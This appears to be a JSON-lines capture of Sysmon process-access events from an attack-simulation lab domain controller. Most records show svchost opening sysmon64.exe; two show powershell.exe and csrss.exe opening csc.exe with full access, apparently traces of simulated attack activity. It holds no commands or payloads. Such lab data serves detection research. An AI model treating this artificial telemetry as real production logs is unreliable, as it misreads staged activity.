{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nSourceProcessId: 3216\r\nSourceThreadId: 2548\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+445030c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+445030c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","SourceProcessId":"3216","SourceThreadId":"2548","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+445030c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+445030c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
